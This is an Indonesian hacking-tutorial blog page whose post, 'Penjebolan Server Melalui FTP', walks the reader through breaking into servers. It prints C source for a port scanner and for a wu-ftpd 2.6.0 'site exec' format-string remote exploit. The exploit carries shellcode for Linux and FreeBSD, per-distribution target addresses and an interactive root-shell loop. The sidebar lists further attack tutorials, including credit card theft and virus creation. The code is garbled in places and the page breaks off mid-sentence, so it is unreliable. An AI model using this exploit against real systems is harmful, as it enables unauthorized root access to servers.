TUTORIAL KOMPUTER
  • 10 Virus Komputer Paling Mematikan Di Dunia
  • Kunci Mempercepat Acces Komputer
  • MENGENAL SISTEM KOMPUTER
  • Sejarah Perkembangan Komputer
  • Informasi computer terkini
  • Mengenal System Software
  • Mengupas Masalah Motherboard
  • Mengupas Detail Tentang CPU
  • Kode Mempercepat Editing Paragraf
  • Memproteksi Folder Dengan Password
  • Macam-Macam Perintah Pada Run Commands
  • Mempercepat Waktu Shutdown
  • Ubah Tampilan Windows
  • Kode Akses Siemens
  • Kode Akses Samsung
  • Kode Akses Sony Ericsson
  • Kode Akses Nokia
  • Seni Photoshop ( Angan Merokok )
  • Menyembunyikan Menu Help Pada Start Menu
  • Menyembunyikan Menu Document Pada Start Menu
  • Menyembunyikan menu Find pada Start Menu
  • Mengembalikan Folder Documents Yang Hilang
  • Memproteksi File
  • Mengganti Icon Drive
  • Mengganti Alignment Pada Drop Down Menu
  • Disable Klik Kanan Pada Taskbar
  • Disable Klik Kanan Pada Dekstop & Explorer
  • Menyembunyikan Menu Start Menu
  • Persentasi Antara Flash Dan Power Point
  • Mengganti Screen Saver Lewat Registry
  • Menghilangkan Username Pada Start Menu
  • Menampilkan Administrator Di Welcome Screen
  • Menyembunyikan My Recent Documents
  • TUTORIAL HACKER
  • Bad Unicode
  • Cara Skip Win Registrasi XP
  • Craking Dengan F.A.R.A.B.I
  • DoS, Serangan yang Belum Tertangkal
  • Hack Dan Prinsip Dasar Psikologis Hack
  • Hacking NT Server Melalui Remote Data Service
  • 95% Web Server Di Dunia has been dead
  • Hacking Web Site with cart32.exe installed
  • Konsep Lain Menjebol Server Webfroot Shutbox
  • Istilah Teknologi Informasi Bahasa Indonesia
  • Mendapatkan account ISP gratis!
  • Mendapatkan Serial Number WinZip 8.1
  • Menghilangkan Password Bios
  • Mengintip Password Linux
  • Menjebol Apache Web Server Melalui Test-Cgi
  • Menjebol Server Melalui Service FTP
  • Pembobolan 1000 Kredit Card di Step-up
  • Penjebolan Server Melalui FTP
  • Hati-hati DLM Mengetikkan Klikbca.Com
  • VIRUS M HEART
  • Bongkar Password Microsoft Acces
  • BUG TELKOMSEL & (FREE Phone ke-CYPRUS
  • Cara Efisien Mendapatkan Puluhan Ribu Email
  • Cara Sederhana membuat virus PHP
  • Cara Singkat Menginfeksi Openssh-3.4p1 Z
  • Cracking GateKeeperm
  • HACKING FOR BEGINNER
  • Hack Windows NT2000XP Admin Password
  • Melewati pembatasan hak akses warnet
  • Melindungi Data dari SQL Injection
  • memainkan fungsi tombol HP
  • Membedah Teknik SQL Injection
  • Bongkar key Windows Dengan @ stake LC4
  • Meminimalkan Biaya Saat menelpon Di Wartel
  • Menangani Virus Lohan
  • MENGACAK-ACAK REGISTRY WARNET
  • Mengelabui Pengejar Hacker
  • Meng-Hack Pesawat Telepon Yang Terkunci
  • Meng-hack PHP-BUg's
  • Kelemahan pasword & login yahoo pd Cgi
  • Trik Penjebolan Sites
  • Ragam Hacking Menggunakan Google
  • Rahasia Teknik Serangan SQL Injenction
  • Teknik Pembuatan Virus Makro Pd XP
  • Seni Internet, Googlingg
  • Situs Hacker Yang Ikut Bermasalah
  • Teknik Hacking Situs KPU Dr segla arah
  • Teknik Menyusup Ke TNP Center KPU
  • Tip N Trik Telephon Gratis Musso
  • Trik Mereset Password Windows 9x
  • TUTORIAL BLOG
  • Menuliskan Script di Blog
  • Membuat Artikel Terkait/Berhubungan
  • Membuat Feed di Blog Dengan Javascript
  • Membuat Navigasi Breadcrumb di Blog
  • Membuat Meta Deskripsi di Halaman Blog
  • Membuat Readmore Versi 1
  • Membuat Read More Otomatis di Blog
  • Membuat Read More Versi 2
  • Membuat Tabs Menu Horizontal
  • Membuat Menu Tab View
  • Membuat Menu Vertikal
  • Cara Memasang Musik Pada Blog
  • Membuat Template Blog Hasil Buatan Sendiri
  • Buat Threaded Comment dgn Intense Debate
  • Membuat Menu DTree
  • Membuat Tab Menu Dengan Banyak Style
  • Menambah Toolbar Baru di Blogspot
  • Cara Membuat Tabel di Blog
  • Cara Membuat Tulisan Berjalan
  • Melakukan Backup Website atau Blog
  • Mendapatkan Free Hosting
  • Membuat Widget Status Twitter pada Blog
  • Manampilkan Profil Facebook di Website (blog)
  • Membuat Avatar Komentar Pada Blogger
  • Membuat Halaman Contact Me pada Blogspot
  • Cara Membuat Status Yahoo Messenger di Blog
  • Mendapatkan Layanan Google Friend Connect
  • Membuat Nomor Page Posting Di Blog
  • Tips dan Trik Menambah Kolom Di Blog
  • Mengatasi "Invalid Widget ID" pada Blogger
  • Membuat Slide Show Album Foto di Blog
  • Membuat Kotak Komentar dibawah Posting
  • Cara Membuat Kotak Link Exchange
  • Membuat Link Download
  • Cara Membuat Dropdown Menu
  • Cara Membuat Buku Tamu
  • Trik Memproteksi Blog
  • Cara Membuat Search Engine
  • Membuat Kategori / Label di Blogger
  • Menghilangkan Navbar (Navigation Bar)
  • Memasang Emoticon di Kotak Komentar
  • Menambah Emoticon di Shoutbox
  • Pasang Jam di Sidebar
  • Memasang Pelacak IP Address
  • Mengganti Tulisan "Older Post / Newer Post"
  • Memasang Alexa Traffic Rank
  • Memasang Tombol Google Buzz
  • Cara Membuat Cursor Animasi
  • Menyembuyikan Buku Tamu
  • 5 Cara Terbaik Mendapatkan Uang Dari Blog
  • Blogging Cepat Dengan BlogThis!
  • 21 Posts Separator Images
  • Mengganti Link Read More Dgn Gambar
  • Cara Menampilkan 10 Artikel Di Recent Posts
  • Offline Blogging Dgn Windows Live Writer
  • Cara Memasang Jadwal Sholat
  • Cara Membuat Daftar Isi Blog Otomatis
  • Membuat Daftar Isi Blog Manual
  • Iklan Google Adsense Di Tengah Artikel
  • Membuat Link Warna - Warni
  • Meletakkan Widget Di Bawah Header
  • Membuat Kotak Scrollbar
  • Memasang Video Di Artikel
  • Kode Warna HTML
  • Home » » Penjebolan Server Melalui FTP

    Penjebolan Server Melalui FTP

    Pada article ini akan memberikan sedikit trik bagaimana melakukan penjebolan server melalui FTP. Untuk lebih jelasnya akan kita ikuti langkah-demi langkah code di bawah ini. Pertama yang perlu disiapkan adalah scanner, saya menyertakannya sourcenya dalam C.
    Mari kita lihat contoh coding nya di bawah ini : 
    Teks warna merah jgn dicopy hy penjelasan
    NB : Tanda kurung seperti (  ) diganti dengan < > dan  hanya yang bertulisan  Include saja.  sedangkan  yang lain tidak masalah.


    #include (stdio.h)
    #include (stdlib.h)
    #include (string.h)
    #include (errno.h)
    #include (unistd.h)
    #include (arpa/inet.h)
    #include (sys/types.h)
    #include (sys/socket.h)
    #include (netinet/tcp.h)
    #include (netinet/ip.h)
    #include (netinet/in.h)
    #include (netdb.h)
    #include (unistd.h)

    #define DEF_STR_PORT 1
    #define DEF_STP_PORT 1024
    #define OXO 1

    struct sockaddr_in addr;
    struct hostent *rh;
    struct servent *rp;

    int sock,i;
    int str_ptr, stp_ptr;
    int Usage(char *ARG);
    int CONNECTION(int port);

    int main(int argc, char *argv[])
    {

    if (argc != 4)
    Usage(argv[0]);

    str_ptr = atoi(argv[2]);
    stp_ptr = atoi(argv[3]);
    if (strcmp(argv[2],"-")==0 && strcmp(argv[3],"-")==0){
    str_ptr = DEF_STR_PORT;
    stp_ptr = DEF_STP_PORT;
    }

    if ( str_ptr > stp_ptr){
    fprintf(stderr,"DetecT ErroR !!! On PortS, Can't
    Be Greater
    Than .-\n");
    Usage(argv[0]);
    exit(OXO);
    }

    if ((rh=gethostbyname(argv[1])) == NULL){
    fprintf(stderr,"Can't Resolve Host %s .-\n",argv[1]);
    Usage(argv[0]);
    exit(OXO);
    }

    printf("ScanninG Host %s From %d TcP Port To %d
    .-\n",argv[1],str_ptr,stp_ptr);
    for (i=str_ptr; i <= stp_ptr; i++) { if (CONNECTION(i)==0) { rp=getservbyport(htons(i),"tcp"); printf("Port %d Is Open !!! <%s> ServicE.-\n",i,(rp
    ==NULL)?"UknowN":rp->s_name);
    }
    close(sock);
    }

    return 0;
    }

    int CONNECTION(int port)
    {

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
    perror("SockeT");
    exit(OXO);
    }

    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr = *((struct in_addr *)rh->h_addr);

    if ((connect(sock,(struct sockaddr *) &addr, sizeof(addr))) ==
    0)
    {
    return 0;
    else
    return 1;
    }

    int Usage(char *ARG)
    {
    fprintf(stderr,"TCPPortS.c By ZinC_Sh(C).-\n");
    fprintf(stderr,"Usage: %s
    .-\n",ARG);
    exit(OXO);
    }

    cara compilenya :
    #gcc ports.c -o ports
    kalau udah di compile sekarang kita scan `#./ports 10.1.xx.xx
    10 100 ;maksudnya scanning 10.1.xx.xx mulai dari port 10
    sampai 100
    Port 21 Is Open !!!
    Service selanjutnya kita tinggal jalanin remote exploit, saya
    juga menyertakannya,
    sourcenya dalam C


    Teks warna merah jgn dicopy hy penjelasan
    NB : Tanda kurung seperti (  ) diganti dengan < > dan  hanya yang bertulisan  Include saja.  sedangkan  yang lain tidak masalah.

    #include (stdio.h)
    #include (string.h)
    #include (stdlib.h)
    #include (sys/types.h)
    #include (sys/socket.h)
    #include (sys/time.h)
    #include (netdb.h)
    #include (unistd.h)
    #include (netinet/in.h)
    #include (arpa/inet.h)
    #include (signal.h)
    #include (errno.h)

    #ifdef __linux
    #include
    #endif

    #define MAKE_STR_FROM_RET(x)
    ((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24)

    #define GREEN "\033[32m"
    #define RED "\033[31m"
    #define NORM "\033[0m"

    char infin_loop[]= /* for testing purposes */
    "\xEB\xFE";

    char bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD
    by venglin */
    "\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
    "\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
    "\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"
    "\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80"
    "\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
    "\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"
    "\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
    "\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
    "\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"
    "\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"
    "\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\xff\xff\x30"
    "\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e"
    "\x67\x6c\x69\x6e";

    char bsd_code_d[]= /* you should call it directly (no
    jump/call)*/
    "\xEB\xFE\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5C"
    "\x8B\x74\x24\xFC\x31\xC9\xB1\x15\x01\xCE\xB1\x71\xB0\xEF"
    "\x30\x06\x8D\x76\x01\xE2\xF9\xDE\x26\xDE\x2F\xBE\x5F\xF8"
    "\xBF\x22\x6F\x5F\xB5\xEB\xB4\xBE\xBF\x22\x6F\x62\xB9\x14"
    "\x87\x75\xED\xEF\xEF\xBD\x5F\x67\xBF\x22\x6F\x62\xB9\x11"
    "\xBE\xBD\x5F\xEA\xBF\x22\x6F\x66\x2C\x62\xB9\x14\xBD\x5F"
    "\xD2\xBF\x22\x6F\xBC\x5F\xE2\xBF\x22\x6F\x5C\x11\x62\xB9"
    "\x12\x5F\xE3\xBD\xBF\x22\x6F\x11\x24\x9A\x1C\x62\xB9\x11"
    "\xBD\x5F\xD2\xBF\x22\x6F\x62\x99\x12\x66\xA1\xEB\x62\xB9"
    "\x17\x66\xF9\xB9\xB9\xBD\x5F\xD4\xBF\x22\x6F\xC0\x8D\x86"
    "\x81\xC0\x9C\x87\xEF\xC1\xC1\xEF";

    char linuxcode[]= /* Lam3rZ chroot() code */
    "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
    "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
    "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
    "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
    "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
    "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
    "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
    "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
    "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
    "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";

    #define MAX_FAILED 4
    #define MAX_MAGIC 100
    static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
    static char *magic_str=NULL;
    int before_len=0;
    char *target=NULL,*username="ftp",*password=NULL;
    struct targets getit;

    struct targets {
    int def;
    char *os_descr, *shellcode;
    int delay;
    u_long pass_addr, addr_ret_addr;
    int magic[MAX_MAGIC], magic_d[MAX_MAGIC],islinux;
    };

    struct targets targ[]={
    {0,"RedHat 6.2 (?) with wuftpd 2.6.0(1) from
    rpm",linuxcode,2,0x8075b00-700,0xbfffb028,{0x87,3,1,2},{1,2,1,4},1},

    {0,"RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from
    rpm",linuxcode,2,0x8075b00-700,0xbfffb038,{0x87,3,1,2},{1,2,1,4},1},

    {0,"SuSe 6.3 with wuftpd 2.6.0(1) from
    rpm",linuxcode,2,0x8076cb0-400,0xbfffb018,{0x87,3,1,2},{1,2,1,4},1},

    {0,"SuSe 6.4 with wuftpd 2.6.0(1) from
    rpm",linuxcode,2,0x8076920-400,0xbfffafec,{0x88,3,1,2},{1,2,1,4},1},

    {0,"RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm
    (test)",linuxcode,2,0x8075b00-700,0xbfffb070,{0x87,3,1,2},{1,2,1,4},1},


    {0,"FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from
    ports",bsdcode,10,0x80bb474-100,
    0xbfbfc164,{0x3b,2,4,1,0x44,2,1,2},{1,2,1,2,1,2,1,4},0},
    {1,"FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from
    packages",bsdcode,2,0x806d5b0-500,0xbfbfc6bc, {0x84,1,2,1,2},
    {1,3,2,1,4},0},
    {0,"FreeBSD 3.4-RELEASE with wuftpd 2.6.0(1) from
    ports",bsdcode,2,0x80a4dec-400,0xbfbfc624,
    {0x3B,2,1,0xe,0x40,1,2,1,2},{1,2,1,2,1,3,2,1,4},0},
    {0,"FreeBSD 4.0-RELEASE with wuftpd 2.6.0(1) from
    packages",infin_loop,2,0x80706f0,0xbfbfe798,{0x88,2,1,2},{1,2,1,4},0},

    {0,NULL,NULL,0,0,0,{0},{0},0}
    };

    void usage(char*zu,int q)
    {
    int i, n, padding;
    fprintf(stderr,"Usage: %s -t [-l user/pass] [-s
    systype] [-o offset] [-g] [-h] [-x]\n"
    " [-m magic_str] [-r ret_addr] [-P padding] [-p pass_addr] [-M
    dir]\n"
    "target : host with any wuftpd\nuser : anonymous user\n"
    "dir : if not anonymous user, you need to have writable
    directory\n"
    "magic_str : magic string (see exploit description)\n-g :
    enables magic string digging\n"
    "-x : enables test mode\npass_addr : pointer to setproctitle
    argument\n"
    "ret_addr : this is pointer to shellcode\nsystypes: \n",zu);
    for(i=0;targ[i].os_descr!=NULL;i++)
    {
    padding=0;
    fprintf(stderr,"%s%2d - %s\n",targ[i].def?"*":"
    ",i,targ[i].os_descr);
    if(q>1)
    {
    fprintf(stderr," Magic ID: [");
    for(n=0;targ[i].magic[n]!=0;n++)
    {
    if(targ[i].magic_d[n]==4)
    padding=targ[i].magic[n];
    fprintf(stderr,"%02X,%02X",targ[i].magic[n],targ[i].magic_d[n]);

    if(targ[i].magic[n+1]!=0)
    fprintf(stderr,":");
    }
    fprintf(stderr,"] Padding: %d\n",padding);
    fflush(stderr);
    }
    }
    exit(1);
    }

    int connect_to_server(char*host){
    struct hostent *hp;
    struct sockaddr_in cl;
    int sock;

    if(host==NULL||*host==(char)0){
    fprintf(stderr,"Invalid hostname\n");
    exit(1);
    }
    if((cl.sin_addr.s_addr=inet_addr(host))==-1) {
    if((hp=gethostbyname(host))==NULL) {
    fprintf(stderr,"Cannot resolve %s\n",host);
    exit(1);
    }
    memcpy((char*)&cl.sin_addr,(char*)hp->h_addr,sizeof(cl.sin_addr));

    }
    if((sock=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))==-1){
    fprintf(stderr,"Error creating socket: %s\n",strerror(errno));

    exit(1);
    }
    cl.sin_family=PF_INET;
    cl.sin_port=htons(21);
    if(connect(sock,(struct sockaddr*)&cl,sizeof(cl))==-1){
    fprintf(stderr,"Cannot connect to %s:
    %s\n",host,strerror(errno));
    exit(1);
    }
    return sock;
    }

    int ftp_recv(int sock,char*buf,int buf_size,int disc)
    {
    int n=0;
    char q;

    if(disc) while((n=recv(sock,&q,1,0))==1&&q!='\n');
    else
    {
    (void)bzero(buf,buf_size);
    n=recv(sock,buf,buf_size,0);
    if(n<0) { fprintf(stderr,"ftp_recv: recv failed\n"); exit(1); } buf[n]=0; } return n; } int ftp_send(int sock,char*what,int size,int f,char*ans,int ans_size) { int n; n=send(sock,what,size,0); if(n!=size) { fprintf(stderr,"ftp_send: failed to send. expected %d, sent %d\n", size,n); shutdown(sock,2); close(sock); exit(1); } if(f) return ftp_recv(sock,ans,ans_size,0); return 0; } int ftp_siteexec(int sock,char*buff,int buff_len,int q,char*ans,int ans_len){ ftp_send(sock,buff,buff_len,q,ans,ans_len); if(strncmp(ans,"200-",4)==0) ftp_recv(sock,NULL,0,1); else ftp_recv(sock,ans,ans_len,0); if(strncmp(ans,"200-",4)){ fprintf(stderr,"Cannot find site exec response string\n"); exit(1); } return 0; } void ftp_login(int sock,char*u_name,char*u_pass) { char buff[2048]; printf("loggin into system..\n"); snprintf(buff,2047,"USER %s\r\n", u_name); ftp_send(sock, buff,strlen(buff),1,buff,2047); printf(GREEN"USER %s\n"NORM"%s",u_name,buff); snprintf(buff,2047,"PASS %s\r\n",u_pass); printf(GREEN"PASS %s\n"NORM,*u_pass=='\x90'?"":u_pass);
    ftp_send(sock,buff,strlen(buff),1,buff,2047);
    while(strstr(buff,"230 ")==NULL){
    (void)bzero(buff,2048);
    ftp_recv(sock,buff,2048,0);
    }
    printf("%s",buff);
    return;
    }

    void ftp_mkchdir(int sock,char*cd,char*new)
    {
    char buff[2048];

    sprintf(buff,"CWD %s\r\n",cd);
    printf(GREEN"%s"NORM,buff);
    ftp_send(sock,buff,strlen(buff),1,buff,2047);
    printf("%s",buff);
    sprintf(buff,"MKD %s\r\n",new);
    ftp_send(sock,buff,strlen(buff),1,buff,2047);
    printf(GREEN"MKD "NORM"\n%s",buff);
    sprintf(buff,"CWD %s\r\n",new);
    ftp_send(sock,buff,strlen(buff),1,buff,2047);
    printf(GREEN"CWD "NORM"\n%s",buff);
    return;
    }
    void process_possibly_rooted(int sock)
    {
    fd_set fd_read;
    char buff[1024], *cmd=getit.islinux?"/bin/uname
    -a;/usr/bin/id;\n":"/usr/bin/uname -a;/usr/bin/id;\n";
    int n;

    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    FD_SET(0, &fd_read);
    send(sock, cmd, strlen(cmd), 0);
    while(1) {
    FD_SET(sock,&fd_read);
    FD_SET(0,&fd_read);
    if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break; if( FD_ISSET(sock, &fd_read) ) { if((n=recv(sock,buff,sizeof(buff),0))<0){ fprintf(stderr, "EOF\n"); exit(2); } if(write(1,buff,n)<0)break; } if ( FD_ISSET(0, &fd_read) ) { if((n=read(0,buff,sizeof(buff)))<0){ fprintf(stderr,"EOF\n"); exit(2); } if(send(sock,buff,n,0)<0) break; } usleep(10); } fprintf(stderr,"Connection aborted, select failed()\n"); exit(0); } int magic_check_f(int sock, char *str) { char q[2048], ans[2048]; snprintf(q, 2048, "site exec %s%s\r\n", str, "%.f"); if( strstr( q, "\r\n") == NULL) { fprintf(stderr,"Line TOO big..\n"); exit(-1); } ftp_siteexec(sock, q, strlen(q), 1, ans, 2048); if( before_len+10 < strlen(&ans[3]) ) return 0; before_len=strlen(&ans[3]); (void)strcat(str,"%.f"); return 1; } int magic_check_o(int sock, char *str) { char q[2048], ans[2048]; snprintf(q, 2048, "site exec %s%s\r\n", str, "%c"); if( strstr( q, "\r\n") == NULL) { fprintf(stderr,"Line TOO big..\n"); exit(-1); } ftp_siteexec( sock, q, strlen(q), 1, ans, 2048); if( before_len== strlen(&ans[3]) ) { before_len+=1; (void)strcat(str, "%d"); return 3; } before_len=strlen(&ans[3]); (void)strcat(str,"%c"); return 2; } int magic_check_ok( int sock, char *str) { char q[2048], ans[2048]; int i ,n=1, f, padding=0; snprintf(q, 2048,"site exec aaaaaaaa%s%s\r\n", str, "%p%p"); if ( strstr(q, "\r\n" ) == NULL) { fprintf(stderr, "Line too long\n"); exit(-1); } (void)bzero(ans, 2048); ftp_siteexec(sock, q, strlen(q), 1, ans, 2047); if(strstr(ans,"0x61616161")==NULL) return 0; for(i =0; i < MAX_MAGIC && magic[i]; i++); magic_d[i]=4; while(n) { for(f=0; f< 2; f++) { snprintf(q, 2048,"site exec %.*saaaa%s%s\r\n", padding, "xxxx", str, f?"%p%p":"%p"); (void)bzero(ans, 2048); ftp_siteexec(sock, q, strlen(q), 1, ans, 2047); if( strstr(ans, "0x61616161")!=NULL) { if (f==0) { magic[i]=padding; return 1; } else if( f==1) { strcat(str,"%p"); magic[i]=padding; return 1; } } } if(padding > 4) {
    fprintf(stderr,"Cannot calculate padding..\n");
    exit(1);
    }
    padding++;
    }
    return 1;
    }

    int magic_digger(int sock)
    {
    int get_out=1,where=0,all_failed=MAX_FAILED*2,f=0,o=0;

    if(magic_str==NULL){
    if((magic_str=(char*)malloc(4092))==NULL){
    perror("malloc");
    exit(errno);
    }
    }
    (void)bzero(magic_str, 4092);
    where=0;
    while(get_out) {
    int q;
    if( where >= MAX_MAGIC-1 || all_failed <= 0 ) return -1; if( magic_check_f(sock, magic_str) ) { o=0,f++; if(f==1){ if(!magic[where]) magic[where]=1; else magic[++where]+=1; magic_d[where]=1; } else magic[where]+=1; all_failed=MAX_FAILED*2; printf("%s", "%.f"); fflush(stdout); goto verify; } all_failed--; if((q=magic_check_o(sock,magic_str))){ f=0,o++; if(o==1){ if(!magic[where]) magic[0]=1; else magic[++where]+=1; magic_d[where]=q; } else { if(magic_d[where]==q) magic[where]+=1; else { magic[++where]=1; magic_d[where]=q; } } all_failed=MAX_FAILED*2; printf("%s", q==2?"%c":"%d"); fflush(stdout); goto verify; } all_failed--; continue; verify: if(magic_check_ok(sock,magic_str)){ putchar('\n'); return 0; } } return 0; } int main(int argc, char *argv[]){ char *buff, *buff_p, *buff_p2, c, shellcode[500],*dir,*passwd=shellcode; int i, sock, num=-2, padding=-1, gm=0, testmode=0,mtype=0,bla=0,offset=0; u_long ret_addr=0, pass_addr=0; for(i=0;targ[i].os_descr!=NULL;i++); while((c=getopt(argc,argv,"t:l:m:o:s:r:p:M:P:xghH?"))!=EOF){ switch(c) { case 't': target=optarg;break; case 'l': username=optarg; passwd=strchr(optarg,'/'); if(passwd==NULL) usage(argv[0],0); *passwd++=(char)0; break; case 'x': testmode=1; break; case 'o': offset=atoi(optarg);break; case 'p': pass_addr=strtoul(optarg, &optarg,16); break; case 'g': gm=1; break; case 'M': dir=optarg;mtype=1;break; case 'm': { int where=0; if(!*optarg) { fprintf(stderr,"-m requires argument, try -h for help\n"); exit(1); } while(1) { magic[where]=strtoul(optarg,&optarg,16); optarg=strchr(optarg,','); if(optarg==NULL){ printf("comma missing\n"); exit(1); } optarg++; magic_d[where++]=strtoul(optarg,&optarg,16); if(strchr(optarg,':')==NULL){ magic[where]=magic_d[where]=0; break; } optarg=strchr(optarg,':'); optarg++; } } break; case 's': num=atoi(optarg); if(num>i) {
    fprintf(stderr,"systype too big, try -h for help\n");
    exit(1);
    }
    break;
    case 'r':
    ret_addr=strtoul(optarg,&optarg,16);
    break;
    case 'P':
    padding=atoi(optarg);
    break;
    case 'H':
    bla=2;
    default: usage(argv[0],bla);break;
    }
    }
    if(target==NULL){
    fprintf(stderr,"No target specified, try -h for help\n");
    exit(1);
    }
    if(num==-1||num==-2) {
    for(i=0;!targ[i].def;i++);
    num=i;
    }
    (void)memcpy((void*)&getit,(void*)&targ[num],sizeof(struct
    targets));

    if(magic[1]!=0) {
    memcpy((void*)getit.magic,magic,sizeof(magic));
    memcpy((void*)getit.magic_d,magic_d,sizeof(magic));
    }

    if(ret_addr)getit.addr_ret_addr=ret_addr;
    if(pass_addr)getit.pass_addr=pass_addr;

    getit.addr_ret_addr+=(offset*4);

    sock=connect_to_server(target);
    memset(shellcode, '\x90', sizeof(shellcode));
    shellcode[sizeof(shellcode)-1]=(char)0;
    if(!mtype){

    memcpy((void*)&shellcode[sizeof(shellcode)-strlen(getit.shellcode)-1],(void*)getit.shellcode,

    strlen(getit.shellcode)+1);
    shellcode[sizeof(shellcode)-1]=(char)0;
    }else{

    memcpy((void*)&shellcode[250-strlen(getit.shellcode)-1],(void*)getit.shellcode,strlen(getit.shellcode));

    shellcode[250-1]=(char)0;
    }
    printf("Target: %s (%s/%s):
    %s\n",target,username,*passwd=='\x90'?"":passwd,getit.os_descr);

    printf("Return Address: 0x%08lx, AddrRetAddr: 0x%08lx,
    Shellcode:
    %d\n\n",getit.pass_addr,getit.addr_ret_addr,strlen(getit.shellcode));


    buff=(char *)malloc(1024);
    bzero(buff,1024);

    (void)ftp_recv(sock,NULL,0,1);

    (void)ftp_login(sock,username,passwd);

    if(gm||(magic_str==NULL&&getit.magic[0]==0)){
    printf("STEP 2A: Generating magic string: ");
    fflush(stdout);
    magic_digger(sock);
    memcpy((void *)getit.magic,(void*)magic,sizeof(magic));
    memcpy((void*)getit.magic_d,(void*)magic_d,sizeof(magic_d));
    printf("STEP 2B: MAGIC STRING: [");
    } else {
    printf("STEP 2 : Skipping, magic number already exists: [");
    }
    for(i=0;i<0)padding=getit.magic[i];break; default:fprintf(stderr,"STEP 3: INternal error\n"); exit(1); break; } } } if(padding<0){ for(num=0;num<(MAX_MAGIC-1)) padding=getit.magic[num]; else fprintf(stderr,"WARNING: PROBLEMS WITH PADDING\n"); } if(!getit.islinux){ if(!testmode) snprintf(buff,4096,"site exec %.*s%c%c%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(getit.addr_ret_addr),magic_str,"%p"); else snprintf(buff,4096,"site exec %.*s%c%c%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(getit.pass_addr),magic_str,"%p"); } else { if(!testmode) snprintf(buff,4096,"site exec %.*s%c%c\xff%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(getit.addr_ret_addr),magic_str,"%p"); else snprintf(buff,4096,"site exec %.*s%c%c\xff%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(getit.pass_addr),magic_str,"%p"); } sleep(getit.delay); fflush(stdout); if((buff_p=(char *)malloc(4096))==NULL){ fprintf(stderr,"malloc failed.\n"); exit(1); } (void)bzero(buff_p,4096); ftp_siteexec(sock,buff,strlen(buff),1,buff_p,4095); if((buff_p2=strchr(buff_p,'\r'))!=NULL) *buff_p2=(char)0; if((buff_p2=strchr(buff_p,'\n'))!=NULL) *buff_p2=(char)0; buff_p2=strstr(buff_p,"|0x"); if(buff_p2==NULL){ fprintf(stderr,"Fix me, incorrect response from '%%p':%s\n",buff_p); exit(1); } buff_p2+=3; if(!testmode) printf("STEP 4 : Ptr address test: 0x%s (if it is not 0x%08lx ^C me now)\n",buff_p2,getit.addr_ret_addr); else printf("STEP 4 : Ptr address test: 0x%s (if it is not 0x%08lx ^C me now)\n",buff_p2,getit.pass_addr); sleep(getit.delay); buff_p2=strstr(buff, "%.f"); *buff_p2++=(char )0; strcpy(buff_p, buff); if(!testmode) sprintf(buff_p+strlen(buff_p),"%s%u%c","%d%.",(u_int)getit.pass_addr,'d'); else sprintf(buff_p+strlen(buff_p),"%s","%d%d"); strcpy(buff_p+strlen(buff_p), buff_p2); buff_p2=strchr(buff_p,'|'); buff_p2++; printf("STEP 5 : Sending code.. this will take about 10 seconds.\n"); if(!testmode){ strcpy(buff_p2,"%n\r\n"); ftp_send(sock,buff_p,strlen(buff_p),0,NULL,0); } else { (void)bzero(buff,4096); strcpy(buff_p2,"%s\r\n"); ftp_send(sock,buff_p,strlen(buff_p),1,buff,4092); printf("got answer: %s\n",buff); exit(0); } free(buff_p); free(buff); signal(SIGINT, SIG_IGN); signal(SIGHUP, SIG_IGN); printf(RED"Press ^\\ to leave shell"NORM"\n"); process_possibly_rooted(sock); return 0; } Exploit ini 